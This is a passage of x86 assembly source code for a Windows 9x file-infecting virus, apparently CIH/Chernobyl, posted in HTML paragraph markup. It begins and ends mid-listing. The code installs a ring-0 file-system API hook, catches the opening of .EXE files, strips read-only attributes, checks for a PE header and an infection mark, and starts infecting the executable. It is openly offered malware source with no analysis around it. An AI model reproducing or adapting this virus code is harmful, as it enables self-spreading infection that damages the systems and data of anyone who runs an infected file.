pop eax </p>
<p>; ************************************* <br>
; * Return Original App to Execute * <br>
; ************************************* </p>
<p>pop ebp </p>
<p>push 00401000h ; Push Original <br>
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack </p>
<p>ret ; Return to Original App Entry Point </p>
<p>; ********************************************************* <br>
; * Ring0 Virus Game Initial Program * <br>
; ********************************************************* </p>
<p>MyExceptionHook: <br>
@2 = MyExceptionHook </p>
<p>jz InstallMyFileSystemApiHook </p>
<p>; ************************************* <br>
; * Do My Virus Exist in System !? * <br>
; ************************************* </p>
<p>mov ecx, dr0 <br>
jecxz AllocateSystemMemoryPage </p>
<p>add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException </p>
<p>; ************************************* <br>
; * Return to Ring3 Initial Program * <br>
; ************************************* </p>
<p>ExitRing0Init: <br>
mov [ebx-04h], bp ; <br>
shr ebp, 16 ; Restore Exception <br>
mov [ebx+02h], bp ; </p>
<p>iretd </p>
<p>; ************************************* <br>
; * Allocate SystemMemory Page to Use * <br>
; ************************************* </p>
<p>AllocateSystemMemoryPage: </p>
<p>mov dr0, ebx ; Set the Mark of My Virus Exist in System </p>
<p>push 00000000fh ; <br>
push ecx ; <br>
push 0ffffffffh ; <br>
push ecx ; <br>
push ecx ; <br>
push ecx ; <br>
push 000000001h ; <br>
push 000000002h ; <br>
int 20h ; VMMCALL _PageAllocate <br>
_PageAllocate = $ ; <br>
dd 00010053h ; Use EAX, ECX, EDX, and flags <br>
add esp, 08h*04h </p>
<p>xchg edi, eax ; EDI = SystemMemory Start Address </p>
<p>lea eax, MyVirusStart-@2[esi] </p>
<p>iretd ; Return to Ring3 Initial Program </p>
<p>; ************************************* <br>
; * Install My File System Api Hook * <br>
; ************************************* </p>
<p>InstallMyFileSystemApiHook: </p>
<p>lea eax, FileSystemApiHook-@6[edi] </p>
<p>push eax ; <br>
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook <br>
IFSMgr_InstallFileSystemApiHook = $ ; <br>
dd 00400067h ; Use EAX, ECX, EDX, and flags </p>
<p>mov dr0, eax ; Save OldFileSystemApiHook Address </p>
<p>pop eax ; EAX = FileSystemApiHook Address </p>
<p>; Save Old IFSMgr_InstallFileSystemApiHook Entry Point <br>
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] <br>
mov edx, [ecx] <br>
mov OldInstallFileSystemApiHook-@3[eax], edx </p>
<p>; Modify IFSMgr_InstallFileSystemApiHook Entry Point <br>
lea eax, InstallFileSystemApiHook-@3[eax] <br>
mov [ecx], eax </p>
<p>cli </p>
<p>jmp ExitRing0Init </p>
<p>; ********************************************************* <br>
; * Code Size of Merge Virus Code Section * <br>
; ********************************************************* </p>
<p>CodeSizeOfMergeVirusCodeSection = offset $ </p>
<p>; ********************************************************* <br>
; * IFSMgr_InstallFileSystemApiHook * <br>
; ********************************************************* </p>
<p>InstallFileSystemApiHook: <br>
push ebx </p>
<p>call @4 ; <br>
@4: ; <br>
pop ebx ; mov ebx, offset FileSystemApiHook <br>
add ebx, FileSystemApiHook-@4 ; </p>
<p>push ebx <br>
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook <br>
IFSMgr_RemoveFileSystemApiHook = $ <br>
dd 00400068h ; Use EAX, ECX, EDX, and flags <br>
pop eax </p>
<p>; Call Original IFSMgr_InstallFileSystemApiHook <br>
; to Link Client FileSystemApiHook <br>
push dword ptr [esp+8] <br>
call OldInstallFileSystemApiHook-@3[ebx] <br>
pop ecx </p>
<p>push eax </p>
<p>; Call Original IFSMgr_InstallFileSystemApiHook <br>
; to Link My FileSystemApiHook <br>
push ebx <br>
call OldInstallFileSystemApiHook-@3[ebx] <br>
pop ecx </p>
<p>mov dr0, eax ; Adjust OldFileSystemApiHook Address </p>
<p>pop eax </p>
<p>pop ebx </p>
<p>ret </p>
<p>; ********************************************************* <br>
; * Static Data * <br>
; ********************************************************* </p>
<p>OldInstallFileSystemApiHook dd ? </p>
<p>; ********************************************************* <br>
; * IFSMgr_FileSystemHook * <br>
; ********************************************************* </p>
<p>; ************************************* <br>
; * IFSMgr_FileSystemHook Entry Point * <br>
; ************************************* </p>
<p>FileSystemApiHook: <br>
@3 = FileSystemApiHook </p>
<p>pushad </p>
<p>call @5 ; <br>
@5: ; <br>
pop esi ; mov esi, offset VirusGameDataStartAddress <br>
add esi, VirusGameDataStartAddress-@5 </p>
<p>; ************************************* <br>
; * Is OnBusy !? * <br>
; ************************************* </p>
<p>test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) <br>
jnz pIFSFunc ; goto pIFSFunc </p>
<p>; ************************************* <br>
; * Is OpenFile !? * <br>
; ************************************* </p>
<p>; if ( NotOpenFile ) <br>
; goto prevhook <br>
lea ebx, [esp+20h+04h+04h] <br>
cmp dword ptr [ebx], 00000024h <br>
jne prevhook </p>
<p>; ************************************* <br>
; * Enable OnBusy * <br>
; ************************************* </p>
<p>inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy </p>
<p>; ************************************* <br>
; * Get FilePath's DriveNumber, * <br>
; * then Set the DriveName to * <br>
; * FileNameBuffer. * <br>
; ************************************* <br>
; * Ex. If DriveNumber is 03h, * <br>
; * DriveName is 'C:'. * <br>
; ************************************* </p>
<p>; mov esi, offset FileNameBuffer <br>
add esi, FileNameBuffer-@6 </p>
<p>push esi </p>
<p>mov al, [ebx+04h] <br>
cmp al, 0ffh <br>
je CallUniToBCSPath </p>
<p>add al, 40h <br>
mov ah, ':' </p>
<p>mov [esi], eax </p>
<p>inc esi <br>
inc esi </p>
<p>; ************************************* <br>
; * UniToBCSPath * <br>
; ************************************* <br>
; * This Service Converts * <br>
; * a Canonicalized Unicode Pathname * <br>
; * to a Normal Pathname in the * <br>
; * Specified BCS Character Set. * <br>
; ************************************* </p>
<p>CallUniToBCSPath: <br>
push 00000000h <br>
push FileNameBufferSize <br>
mov ebx, [ebx+10h] <br>
mov eax, [ebx+0ch] <br>
add eax, 04h <br>
push eax <br>
push esi <br>
int 20h ; VXDCall UniToBCSPath <br>
UniToBCSPath = $ <br>
dd 00400041h <br>
add esp, 04h*04h </p>
<p>; ************************************* <br>
; * Is FileName '.EXE' !? * <br>
; ************************************* </p>
<p>; cmp [esi+eax-04h], '.EXE' <br>
cmp [esi+eax-04h], 'EXE.' <br>
pop esi <br>
jne DisableOnBusy </p>
<p>IF DEBUG </p>
<p>; ************************************* <br>
; * Only for Debug * <br>
; ************************************* </p>
<p>; cmp [esi+eax-06h], 'FUCK' <br>
cmp [esi+eax-06h], 'KCUF' <br>
jne DisableOnBusy </p>
<p>ENDIF </p>
<p>; ************************************* <br>
; * Is Open Existing File !? * <br>
; ************************************* </p>
<p>; if ( NotOpenExistingFile ) <br>
; goto DisableOnBusy <br>
cmp word ptr [ebx+18h], 01h <br>
jne DisableOnBusy </p>
<p>; ************************************* <br>
; * Get Attributes of the File * <br>
; ************************************* </p>
<p>mov ax, 4300h <br>
int 20h ; VXDCall IFSMgr_Ring0_FileIO <br>
IFSMgr_Ring0_FileIO = $ <br>
dd 00400032h </p>
<p>jc DisableOnBusy </p>
<p>push ecx </p>
<p>; ************************************* <br>
; * Get IFSMgr_Ring0_FileIO Address * <br>
; ************************************* </p>
<p>mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] <br>
mov edi, [edi] </p>
<p>; ************************************* <br>
; * Is Read-Only File !? * <br>
; ************************************* </p>
<p>test cl, 01h <br>
jz OpenFile </p>
<p>; ************************************* <br>
; * Modify Read-Only File to Write * <br>
; ************************************* </p>
<p>mov ax, 4301h <br>
xor ecx, ecx <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; ************************************* <br>
; * Open File * <br>
; ************************************* </p>
<p>OpenFile: <br>
xor eax, eax <br>
mov ah, 0d5h <br>
xor ecx, ecx <br>
xor edx, edx <br>
inc edx <br>
mov ebx, edx <br>
inc ebx <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>xchg ebx, eax ; mov ebx, FileHandle </p>
<p>; ************************************* <br>
; * Need to Restore * <br>
; * Attributes of the File !? * <br>
; ************************************* </p>
<p>pop ecx </p>
<p>pushf </p>
<p>test cl, 01h <br>
jz IsOpenFileOK </p>
<p>; ************************************* <br>
; * Restore Attributes of the File * <br>
; ************************************* </p>
<p>mov ax, 4301h <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; ************************************* <br>
; * Is Open File OK !? * <br>
; ************************************* </p>
<p>IsOpenFileOK: <br>
popf </p>
<p>jc DisableOnBusy </p>
<p>; ************************************* <br>
; * Open File Already Succeed. ^__^ * <br>
; ************************************* </p>
<p>push esi ; Push FileNameBuffer Address to Stack </p>
<p>pushf ; Now CF = 0, Push Flag to Stack </p>
<p>add esi, DataBuffer-@7 ; mov esi, offset DataBuffer </p>
<p>; *************************** <br>
; * Get OffsetToNewHeader * <br>
; *************************** </p>
<p>xor eax, eax <br>
mov ah, 0d6h </p>
<p>; For Doing Minimal VirusCode's Length, <br>
; I Save EAX to EBP. <br>
mov ebp, eax </p>
<p>xor ecx, ecx <br>
mov cl, 04h <br>
xor edx, edx <br>
mov dl, 3ch <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>mov edx, [esi] </p>
<p>; *************************** <br>
; * Get 'PE\0' Signature * <br>
; * of ImageFileHeader, and * <br>
; * Infected Mark. * <br>
; *************************** </p>
<p>dec edx </p>
<p>mov eax, ebp <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; *************************** <br>
; * Is PE !? * <br>
; *************************** <br>
; * Is the File * <br>
; * Already Infected !? * <br>
; *************************** </p>
<p>; cmp [esi], '\0PE\0' <br>
cmp dword ptr [esi], 00455000h <br>
jne CloseFile </p>
<p>; ************************************* <br>
; * The File is ^o^ * <br>
; * PE(Portable Executable) indeed. * <br>
; ************************************* <br>
; * The File isn't also Infected. * <br>
; ************************************* </p>
<p>; ************************************* <br>
; * Start to Infect the File * <br>
; ************************************* <br>
; * Registers Use Status Now : * <br>
; * * <br>
; * EAX = 04h * <br>
; * EBX = File Handle * <br>
; * ECX = 04h * <br>
; * EDX = 'PE\0\0' Signature of * <br>
; * ImageFileHeader Pointer's * <br>
; * Former Byte. * <br>
; * ESI = DataBuffer Address ==> @8 * <br>
; * EDI = IFSMgr_Ring0_FileIO Address * <br>